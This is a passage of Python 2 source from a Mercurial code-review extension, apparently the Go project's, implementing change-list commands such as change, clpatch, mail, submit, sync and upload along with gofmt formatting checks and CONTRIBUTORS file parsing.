taken[f] = cl
return taken
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
return ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
set_status("running gofmt")
CheckGofmt(ui, repo, files, just_warn)
CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
files = gofmt_required(files)
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
if not files:
return
try:
cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
cmd.stdin.close()
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
data = cmd.stdout.read()
errors = cmd.stderr.read()
cmd.wait()
set_status("done with gofmt")
if len(errors) > 0:
ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
return
if len(data) > 0:
msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f) and not re.search(r"\.tab\.[ch]$", f)]
if not files:
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
files = [f for f in files if os.access(f, 0)]
badfiles = []
for f in files:
try:
for line in open(f, 'r'):
# Four leading spaces is enough to complain about,
# except that some Plan 9 code uses four spaces as the label indent,
# so allow that.
if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
badfiles.append(f)
break
except:
# ignore cannot open file, etc.
pass
if len(badfiles) > 0:
msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
if just_warn:
ui.warn("warning: " + msg + "\n")
else:
raise hg_util.Abort(msg)
return
#######################################################################
# CONTRIBUTORS file parsing
contributorsCache = None
contributorsURL = None
def ReadContributors(ui, repo):
global contributorsCache
if contributorsCache is not None:
return contributorsCache
try:
if contributorsURL is not None:
opening = contributorsURL
f = urllib2.urlopen(contributorsURL)
else:
opening = repo.root + '/CONTRIBUTORS'
f = open(repo.root + '/CONTRIBUTORS', 'r')
except:
ui.write("warning: cannot open %s: %s\n" % (opening, ExceptionDetail()))
return
contributors = {}
for line in f:
# CONTRIBUTORS is a list of lines like:
# Person <email>
# Person <email> <alt-email>
# The first email address is the one used in commit logs.
if line.startswith('#'):
continue
m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
if m:
name = m.group(1)
email = m.group(2)[1:-1]
contributors[email.lower()] = (name, email)
for extra in m.group(3).split():
contributors[extra[1:-1].lower()] = (name, email)
contributorsCache = contributors
return contributors
def CheckContributor(ui, repo, user=None):
set_status("checking CONTRIBUTORS file")
user, userline = FindContributor(ui, repo, user, warn=False)
if not userline:
raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
return userline
def FindContributor(ui, repo, user=None, warn=True):
if not user:
user = ui.config("ui", "username")
if not user:
raise hg_util.Abort("[ui] username is not configured in .hgrc")
user = user.lower()
m = re.match(r".*<(.*)>", user)
if m:
user = m.group(1)
contributors = ReadContributors(ui, repo)
if user not in contributors:
if warn:
ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
return user, None
user, email = contributors[user]
return email, "%s <%s>" % (user, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
hgversion = hg_util.version()
# We require Mercurial 1.9 and suggest Mercurial 2.1.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.1"
old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".
To install a new Mercurial, visit http://mercurial.selenic.com/downloads/.
"""
linux_message = """
You may need to clear your current Mercurial installation by running:
sudo apt-get remove mercurial mercurial-common
sudo rm -rf /etc/mercurial
"""
if hgversion < hg_required:
msg = old_message
if os.access("/etc/mercurial", 0):
msg += linux_message
raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
def __init__(self, ui):
self.ui = ui
ui.pushbuffer()
self.oldQuiet = ui.quiet
ui.quiet = True
self.oldVerbose = ui.verbose
ui.verbose = False
def output(self):
ui = self.ui
ui.quiet = self.oldQuiet
ui.verbose = self.oldVerbose
return ui.popbuffer()
def to_slash(path):
if sys.platform == "win32":
return path.replace('\\', '/')
return path
def hg_matchPattern(ui, repo, *pats, **opts):
w = uiwrap(ui)
hg_commands.status(ui, repo, *pats, **opts)
text = w.output()
ret = []
prefix = to_slash(os.path.realpath(repo.root))+'/'
for line in text.split('\n'):
f = line.split()
if len(f) > 1:
if len(pats) > 0:
# Given patterns, Mercurial shows relative to cwd
p = to_slash(os.path.realpath(f[1]))
if not p.startswith(prefix):
print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
else:
ret.append(p[len(prefix):])
else:
# Without patterns, Mercurial shows relative to root (what we want)
ret.append(to_slash(f[1]))
return ret
def hg_heads(ui, repo):
w = uiwrap(ui)
hg_commands.heads(ui, repo)
return w.output()
noise = [
"",
"resolving manifests",
"searching for changes",
"couldn't find merge tool hgmerge",
"adding changesets",
"adding manifests",
"adding file changes",
"all local heads known remotely",
]
def isNoise(line):
line = str(line)
for x in noise:
if line == x:
return True
return False
def hg_incoming(ui, repo):
w = uiwrap(ui)
ret = hg_commands.incoming(ui, repo, force=False, bundle="")
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_log(ui, repo, **opts):
for k in ['date', 'keyword', 'rev', 'user']:
if not opts.has_key(k):
opts[k] = ""
w = uiwrap(ui)
ret = hg_commands.log(ui, repo, **opts)
if ret:
raise hg_util.Abort(ret)
return w.output()
def hg_outgoing(ui, repo, **opts):
w = uiwrap(ui)
ret = hg_commands.outgoing(ui, repo, **opts)
if ret and ret != 1:
raise hg_util.Abort(ret)
return w.output()
def hg_pull(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True # for file list
err = hg_commands.pull(ui, repo, **opts)
for line in w.output().split('\n'):
if isNoise(line):
continue
if line.startswith('moving '):
line = 'mv ' + line[len('moving '):]
if line.startswith('getting ') and line.find(' to ') >= 0:
line = 'mv ' + line[len('getting '):]
if line.startswith('getting '):
line = '+ ' + line[len('getting '):]
if line.startswith('removing '):
line = '- ' + line[len('removing '):]
ui.write(line + '\n')
return err
def hg_push(ui, repo, **opts):
w = uiwrap(ui)
ui.quiet = False
ui.verbose = True
err = hg_commands.push(ui, repo, **opts)
for line in w.output().split('\n'):
if not isNoise(line):
ui.write(line + '\n')
return err
def hg_commit(ui, repo, *pats, **opts):
return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
commit_okay = False
def precommithook(ui, repo, **opts):
if hgversion >= "2.1":
from mercurial import phases
if repo.ui.config('phases', 'new-commit') >= phases.secret:
return False
if commit_okay:
return False # False means okay.
ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
global match_repo
global match_ui
global match_orig
match_ui = ui
match_repo = repo
from mercurial import scmutil
match_orig = scmutil.match
scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
taken = []
files = []
pats = pats or []
opts = opts or {}
for p in pats:
if p.startswith('@'):
taken.append(p)
clname = p[1:]
if clname == "default":
files = DefaultFiles(match_ui, match_repo, [])
else:
if not GoodCLName(clname):
raise hg_util.Abort("invalid CL name " + clname)
cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
if err != '':
raise hg_util.Abort("loading CL " + clname + ": " + err)
if not cl.files:
raise hg_util.Abort("no files in CL " + clname)
files = Add(files, cl.files)
pats = Sub(pats, taken) + ['path:'+f for f in files]
# work-around for http://selenic.com/hg/rev/785bbc8634f8
if not hasattr(ctx, 'match'):
ctx = ctx[None]
return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
def hgcommand(f):
return f
#######################################################################
# hg change
@hgcommand
def change(ui, repo, *pats, **opts):
"""create, edit or delete a change list
Create, edit or delete a change list.
A change list is a group of files to be reviewed and submitted together,
plus a textual description of the change.
Change lists are referred to by simple alphanumeric names.
Changes must be reviewed before they can be submitted.
In the absence of options, the change command opens the
change list for editing in the default editor.
Deleting a change with the -d or -D flag does not affect
the contents of the files listed in that change. To revert
the files listed in a change, use
hg revert @123456
before running hg change -d 123456.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
dirty = {}
if len(pats) > 0 and GoodCLName(pats[0]):
name = pats[0]
if len(pats) != 1:
raise hg_util.Abort("cannot specify CL name and file patterns")
pats = pats[1:]
cl, err = LoadCL(ui, repo, name, web=True)
if err != '':
raise hg_util.Abort(err)
if not cl.local and (opts["stdin"] or not opts["stdout"]):
raise hg_util.Abort("cannot change non-local CL " + name)
else:
name = "new"
cl = CL("new")
if repo[None].branch() != "default":
raise hg_util.Abort("cannot create CL outside default branch; switch with 'hg update default'")
dirty[cl] = True
files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
if opts["delete"] or opts["deletelocal"]:
if opts["delete"] and opts["deletelocal"]:
raise hg_util.Abort("cannot use -d and -D together")
flag = "-d"
if opts["deletelocal"]:
flag = "-D"
if name == "new":
raise hg_util.Abort("cannot use "+flag+" with file patterns")
if opts["stdin"] or opts["stdout"]:
raise hg_util.Abort("cannot use "+flag+" with -i or -o")
if not cl.local:
raise hg_util.Abort("cannot change non-local CL " + name)
if opts["delete"]:
if cl.copied_from:
raise hg_util.Abort("original author must delete CL; hg change -D will remove locally")
PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
return
if opts["stdin"]:
s = sys.stdin.read()
clx, line, err = ParseCL(s, name)
if err != '':
raise hg_util.Abort("error parsing change list: line %d: %s" % (line, err))
if clx.desc is not None:
cl.desc = clx.desc;
dirty[cl] = True
if clx.reviewer is not None:
cl.reviewer = clx.reviewer
dirty[cl] = True
if clx.cc is not None:
cl.cc = clx.cc
dirty[cl] = True
if clx.files is not None:
cl.files = clx.files
dirty[cl] = True
if clx.private != cl.private:
cl.private = clx.private
dirty[cl] = True
if not opts["stdin"] and not opts["stdout"]:
if name == "new":
cl.files = files
err = EditCL(ui, repo, cl)
if err != "":
raise hg_util.Abort(err)
dirty[cl] = True
for d, _ in dirty.items():
name = d.name
d.Flush(ui, repo)
if name == "new":
d.Upload(ui, repo, quiet=True)
if opts["stdout"]:
ui.write(cl.EditorText())
elif opts["pending"]:
ui.write(cl.PendingText())
elif name == "new":
if ui.quiet:
ui.write(cl.name)
else:
ui.write("CL created: " + cl.url + "\n")
return
#######################################################################
# hg code-login (broken?)
@hgcommand
def code_login(ui, repo, **opts):
"""log in to code review server
Logs in to the code review server, saving a cookie in
a file in your home directory.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
@hgcommand
def clpatch(ui, repo, clname, **opts):
"""import a patch from the code review server
Imports a patch from the code review server into the local client.
If the local client has already modified any of the files that the
patch modifies, this command will refuse to apply the patch.
Submitting an imported patch will keep the original author's
name as the Author: line but add your own name to a Committer: line.
"""
if repo[None].branch() != "default":
raise hg_util.Abort("cannot run hg clpatch outside default branch")
err = clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
if err:
raise hg_util.Abort(err)
@hgcommand
def undo(ui, repo, clname, **opts):
"""undo the effect of a CL
Creates a new CL that undoes an earlier CL.
After creating the CL, opens the CL text for editing so that
you can add the reason for the undo to the description.
"""
if repo[None].branch() != "default":
raise hg_util.Abort("cannot run hg undo outside default branch")
err = clpatch_or_undo(ui, repo, clname, opts, mode="undo")
if err:
raise hg_util.Abort(err)
@hgcommand
def release_apply(ui, repo, clname, **opts):
"""apply a CL to the release branch
Creates a new CL copying a previously committed change
from the main branch to the release branch.
The current client must either be clean or already be in
the release branch.
The release branch must be created by starting with a
clean client, disabling the code review plugin, and running:
hg update weekly.YYYY-MM-DD
hg branch release-branch.rNN
hg commit -m 'create release-branch.rNN'
hg push --new-branch
Then re-enable the code review plugin.
People can test the release branch by running
hg update release-branch.rNN
in a clean client. To return to the normal tree,
hg update default
Move changes since the weekly into the release branch
using hg release-apply followed by the usual code review
process and hg submit.
When it comes time to tag the release, record the
final long-form tag of the release-branch.rNN
in the *default* branch's .hgtags file. That is, run
hg update default
and then edit .hgtags as you would for a weekly.
"""
c = repo[None]
if not releaseBranch:
raise hg_util.Abort("no active release branches")
if c.branch() != releaseBranch:
if c.modified() or c.added() or c.removed():
raise hg_util.Abort("uncommitted local changes - cannot switch branches")
err = hg_clean(repo, releaseBranch)
if err:
raise hg_util.Abort(err)
try:
err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
if err:
raise hg_util.Abort(err)
except Exception, e:
hg_clean(repo, "default")
raise e
def rev2clname(rev):
# Extract CL name from revision description.
# The last line in the description that is a codereview URL is the real one.
# Earlier lines might be part of the user-written description.
all = re.findall('(?m)^https?://codereview.appspot.com/([0-9]+)$', rev.description())
if len(all) > 0:
return all[-1]
return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
if codereview_disabled:
return codereview_disabled
if mode == "undo" or mode == "backport":
# Find revision in Mercurial repository.
# Assume CL number is 7+ decimal digits.
# Otherwise is either change log sequence number (fewer decimal digits),
# hexadecimal hash, or tag name.
# Mercurial will fall over long before the change log
# sequence numbers get to be 7 digits long.
if re.match('^[0-9]{7,}$', clname):
found = False
for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
rev = repo[r]
# Last line with a code review URL is the actual review URL.
# Earlier ones might be part of the CL description.
n = rev2clname(rev)
if n == clname:
found = True
break
if not found:
return "cannot find CL %s in local repository" % clname
else:
rev = repo[clname]
if not rev:
return "unknown revision %s" % clname
clname = rev2clname(rev)
if clname == "":
return "cannot find CL name in revision description"
# Create fresh CL and start with patch that would reverse the change.
vers = hg_node.short(rev.node())
cl = CL("new")
desc = str(rev.description())
if mode == "undo":
cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
else:
cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
v1 = vers
v0 = hg_node.short(rev.parents()[0].node())
if mode == "undo":
arg = v1 + ":" + v0
else:
vers = v0
arg = v0 + ":" + v1
patch = RunShell(["hg", "diff", "--git", "-r", arg])
else: # clpatch
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
if patch == emptydiff:
return "codereview issue %s has no diff" % clname
# find current hg version (hg identify)
ctx = repo[None]
parents = ctx.parents()
id = '+'.join([hg_node.short(p.node()) for p in parents])
# if version does not match the patch version,
# try to update the patch line numbers.
if vers != "" and id != vers:
# "vers in repo" gives the wrong answer
# on some versions of Mercurial. Instead, do the actual
# lookup and catch the exception.
try:
repo[vers].description()
except:
return "local repository is out of date; sync to get %s" % (vers)
patch1, err = portPatch(repo, patch, vers, id)
if err != "":
if not opts["ignore_hgapplydiff_failure"]:
return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
else:
patch = patch1
argv = ["hgapplydiff"]
if opts["no_incoming"] or mode == "backport":
argv += ["--checksync=false"]
try:
cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
except:
return "hgapplydiff: " + ExceptionDetail() + "\nInstall hgapplydiff with:\n$ go get code.google.com/p/go.codereview/cmd/hgapplydiff\n"
out, err = cmd.communicate(patch)
if cmd.returncode != 0 and not opts["ignore_hgapplydiff_failure"]:
return "hgapplydiff failed"
cl.local = True
cl.files = out.strip().split()
if not cl.files and not opts["ignore_hgapplydiff_failure"]:
return "codereview issue %s has no changed files" % clname
files = ChangedFiles(ui, repo, [])
extra = Sub(cl.files, files)
if extra:
ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
cl.Flush(ui, repo)
if mode == "undo":
err = EditCL(ui, repo, cl)
if err != "":
return "CL created, but error editing: " + err
cl.Flush(ui, repo)
else:
ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
lines = patch.splitlines(True) # True = keep \n
delta = None
for i in range(len(lines)):
line = lines[i]
if line.startswith('--- a/'):
file = line[6:-1]
delta = fileDeltas(repo, file, oldver, newver)
if not delta or not line.startswith('@@ '):
continue
# @@ -x,y +z,w @@ means the patch chunk replaces
# the original file's line numbers x up to x+y with the
# line numbers z up to z+w in the new file.
# Find the delta from x in the original to the same
# line in the current version and add that delta to both
# x and z.
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
return None, "error parsing patch line numbers"
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
d, err = lineDelta(delta, n1, len1)
if err != "":
return "", err
n1 += d
n2 += d
lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
newpatch = ''.join(lines)
return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
data = RunShell(cmd, silent_ok=True)
deltas = []
for line in data.splitlines():
m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
if not m:
continue
n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
deltas.append((n1, len1, n2+len2-(n1+len1)))
return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
d = 0
for (old, oldlen, newdelta) in deltas:
if old >= n+len:
break
if old+len > n:
return 0, "patch and recent changes conflict"
d = newdelta
return d, ""
@hgcommand
def download(ui, repo, clname, **opts):
"""download a change from the code review server
Download prints a description of the given change list
followed by its diff, downloaded from the code review server.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
cl, vers, patch, err = DownloadCL(ui, repo, clname)
if err != "":
return err
ui.write(cl.EditorText() + "\n")
ui.write(patch + "\n")
return
#######################################################################
# hg file
@hgcommand
def file(ui, repo, clname, pat, *pats, **opts):
"""assign files to or remove files from a change list
Assign files to or (with -d) remove files from a change list.
The -d option only removes files from the change list.
It does not edit them or remove them from the repository.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
pats = tuple([pat] + list(pats))
if not GoodCLName(clname):
return "invalid CL name " + clname
dirty = {}
cl, err = LoadCL(ui, repo, clname, web=False)
if err != '':
return err
if not cl.local:
return "cannot change non-local CL " + clname
files = ChangedFiles(ui, repo, pats)
if opts["delete"]:
oldfiles = Intersect(files, cl.files)
if oldfiles:
if not ui.quiet:
ui.status("# Removing files from CL. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
for f in oldfiles:
ui.status("# hg file %s %s\n" % (cl.name, f))
cl.files = Sub(cl.files, oldfiles)
cl.Flush(ui, repo)
else:
ui.status("no such files in CL")
return
if not files:
return "no such modified files"
files = Sub(files, cl.files)
taken = Taken(ui, repo)
warned = False
for f in files:
if f in taken:
if not warned and not ui.quiet:
ui.status("# Taking files from other CLs. To undo:\n")
ui.status("# cd %s\n" % (repo.root))
warned = True
ocl = taken[f]
if not ui.quiet:
ui.status("# hg file %s %s\n" % (ocl.name, f))
if ocl not in dirty:
ocl.files = Sub(ocl.files, files)
dirty[ocl] = True
cl.files = Add(cl.files, files)
dirty[cl] = True
for d, _ in dirty.items():
d.Flush(ui, repo)
return
#######################################################################
# hg gofmt
@hgcommand
def gofmt(ui, repo, *pats, **opts):
"""apply gofmt to modified files
Applies gofmt to the modified files in the repository that match
the given patterns.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
files = ChangedExistingFiles(ui, repo, pats, opts)
files = gofmt_required(files)
if not files:
ui.status("no modified go files\n")
return
cwd = os.getcwd()
files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
try:
cmd = ["gofmt", "-l"]
if not opts["list"]:
cmd += ["-w"]
if subprocess.call(cmd + files) != 0:
raise hg_util.Abort("gofmt did not exit cleanly")
except hg_error.Abort, e:
raise
except:
raise hg_util.Abort("gofmt: " + ExceptionDetail())
return
def gofmt_required(files):
return [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
#######################################################################
# hg mail
@hgcommand
def mail(ui, repo, *pats, **opts):
"""mail a change for review
Uploads a patch to the code review server and then sends mail
to the reviewer and CC list asking for a review.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
cl, err = CommandLineCL(ui, repo, pats, opts, op="mail", defaultcc=defaultcc)
if err != "":
raise hg_util.Abort(err)
cl.Upload(ui, repo, gofmt_just_warn=True)
if not cl.reviewer:
# If no reviewer is listed, assign the review to defaultcc.
# This makes sure that it appears in the
# codereview.appspot.com/user/defaultcc
# page, so that it doesn't get dropped on the floor.
if not defaultcc:
raise hg_util.Abort("no reviewers listed in CL")
cl.cc = Sub(cl.cc, defaultcc)
cl.reviewer = defaultcc
cl.Flush(ui, repo)
if cl.files == []:
raise hg_util.Abort("no changed files, not sending mail")
cl.Mail(ui, repo)
#######################################################################
# hg p / hg pq / hg ps / hg pending
@hgcommand
def ps(ui, repo, *pats, **opts):
"""alias for hg p --short
"""
opts['short'] = True
return pending(ui, repo, *pats, **opts)
@hgcommand
def pq(ui, repo, *pats, **opts):
"""alias for hg p --quick
"""
opts['quick'] = True
return pending(ui, repo, *pats, **opts)
@hgcommand
def pending(ui, repo, *pats, **opts):
"""show pending changes
Lists pending changes followed by a list of unassigned but modified files.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
quick = opts.get('quick', False)
short = opts.get('short', False)
m = LoadAllCL(ui, repo, web=not quick and not short)
names = m.keys()
names.sort()
for name in names:
cl = m[name]
if short:
ui.write(name + "\t" + line1(cl.desc) + "\n")
else:
ui.write(cl.PendingText(quick=quick) + "\n")
if short:
return 0
files = DefaultFiles(ui, repo, [])
if len(files) > 0:
s = "Changed files not in any CL:\n"
for f in files:
s += "\t" + f + "\n"
ui.write(s)
#######################################################################
# hg submit
def need_sync():
raise hg_util.Abort("local repository out of date; must sync before submit")
@hgcommand
def submit(ui, repo, *pats, **opts):
"""submit change to remote repository
Submits change to remote repository.
Bails out if the local repository is not in sync with the remote one.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
# We already called this on startup but sometimes Mercurial forgets.
set_mercurial_encoding_to_utf8()
if not opts["no_incoming"] and hg_incoming(ui, repo):
need_sync()
cl, err = CommandLineCL(ui, repo, pats, opts, op="submit", defaultcc=defaultcc)
if err != "":
raise hg_util.Abort(err)
user = None
if cl.copied_from:
user = cl.copied_from
userline = CheckContributor(ui, repo, user)
typecheck(userline, str)
about = ""
if cl.reviewer:
about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
if opts.get('tbr'):
tbr = SplitCommaSpace(opts.get('tbr'))
cl.reviewer = Add(cl.reviewer, tbr)
about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
if cl.cc:
about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
if not cl.reviewer:
raise hg_util.Abort("no reviewers listed in CL")
if not cl.local:
raise hg_util.Abort("cannot submit non-local CL")
# upload, to sync current patch and also get change number if CL is new.
if not cl.copied_from:
cl.Upload(ui, repo, gofmt_just_warn=True)
# check gofmt for real; allowed upload to warn in order to save CL.
cl.Flush(ui, repo)
CheckFormat(ui, repo, cl.files)
about += "%s%s\n" % (server_url_base, cl.name)
if cl.copied_from:
about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
typecheck(about, str)
if not cl.mailed and not cl.copied_from: # in case this is TBR
cl.Mail(ui, repo)
# submit changes locally
message = cl.desc.rstrip() + "\n\n" + about
typecheck(message, str)
set_status("pushing " + cl.name + " to remote server")
if hg_outgoing(ui, repo):
raise hg_util.Abort("local repository corrupt or out-of-phase with remote: found outgoing changes")
old_heads = len(hg_heads(ui, repo).split())
global commit_okay
commit_okay = True
ret = hg_commit(ui, repo, *['path:'+f for f in cl.files], message=message, user=userline)
commit_okay = False
if ret:
raise hg_util.Abort("nothing changed")
node = repo["-1"].node()
# push to remote; if it fails for any reason, roll back
try:
new_heads = len(hg_heads(ui, repo).split())
if old_heads != new_heads and not (old_heads == 0 and new_heads == 1):
# Created new head, so we weren't up to date.
need_sync()
# Push changes to remote. If it works, we're committed. If not, roll back.
try:
if hg_push(ui, repo):
raise hg_util.Abort("push error")
except hg_error.Abort, e:
if e.message.find("push creates new heads") >= 0:
# Remote repository had changes we missed.
need_sync()
raise
except urllib2.HTTPError, e:
print >>sys.stderr, "pushing to remote server failed; do you have commit permissions?"
raise
except:
real_rollback()
raise
# We're committed. Upload final patch, close review, add commit message.
changeURL = hg_node.short(node)
url = ui.expandpath("default")
m = re.match("(^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?)" + "|" +
"(^https?://([^@/]+@)?code\.google\.com/p/([^/.]+)(\.[^./]+)?/?)", url)
if m:
if m.group(1): # prj.googlecode.com/hg/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(3), changeURL)
elif m.group(4) and m.group(7): # code.google.com/p/prj.subrepo/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s&repo=%s" % (m.group(6), changeURL, m.group(7)[1:])
elif m.group(4): # code.google.com/p/prj/ case
changeURL = "https://code.google.com/p/%s/source/detail?r=%s" % (m.group(6), changeURL)
else:
print >>sys.stderr, "URL: ", url
else:
print >>sys.stderr, "URL: ", url
pmsg = "*** Submitted as " + changeURL + " ***\n\n" + message
# When posting, move reviewers to CC line,
# so that the issue stops showing up in their "My Issues" page.
PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
c = repo[None]
if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
ui.write("switching from %s to default branch.\n" % releaseBranch)
err = hg_clean(repo, "default")
if err:
return err
return 0
#######################################################################
# hg sync
@hgcommand
def sync(ui, repo, **opts):
"""synchronize with remote repository
Incorporates recent changes from the remote repository
into the local repository.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
if not opts["local"]:
err = hg_pull(ui, repo, update=True)
if err:
return err
sync_changes(ui, repo)
def sync_changes(ui, repo):
# Look through recent change log descriptions to find
# potential references to http://.*/our-CL-number.
# Double-check them by looking at the Rietveld log.
for rev in hg_log(ui, repo, limit=100, template="{node}\n").split():
desc = repo[rev].description().strip()
for clname in re.findall('(?m)^https?://(?:[^\n]+)/([0-9]+)$', desc):
if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
cl, err = LoadCL(ui, repo, clname, web=False)
if err != "":
ui.warn("loading CL %s: %s\n" % (clname, err))
continue
if not cl.copied_from:
EditDesc(cl.name, closed=True, private=cl.private)
cl.Delete(ui, repo)
# Remove files that are not modified from the CLs in which they appear.
all = LoadAllCL(ui, repo, web=False)
changed = ChangedFiles(ui, repo, [])
for cl in all.values():
extra = Sub(cl.files, changed)
if extra:
ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
for f in extra:
ui.warn("\t%s\n" % (f,))
cl.files = Sub(cl.files, extra)
cl.Flush(ui, repo)
if not cl.files:
if not cl.copied_from:
ui.warn("CL %s has no files; delete (abandon) with hg change -d %s\n" % (cl.name, cl.name))
else:
ui.warn("CL %s has no files; delete locally with hg change -D %s\n" % (cl.name, cl.name))
return 0
#######################################################################
# hg upload
@hgcommand
def upload(ui, repo, name, **opts):
"""upload diffs to the code review server
Uploads the current modifications for a given change to the server.
"""
if codereview_disabled:
raise hg_util.Abort(codereview_disabled)
repo.ui.quiet = True
cl, err = LoadCL(ui, repo, name, web=True)
if err != "":
raise hg_util.Abort(err)
if not cl.local:
raise hg_util.Abort("cannot upload non-local change")
cl.Upload(ui, repo)
print "%s%s\n" % (server_url_base, cl.name)
return 0
#######################################################################
# Table of commands, supplied to Mercurial for installation.
review_opts = [
('r', 'reviewer', '', 'add reviewer'),
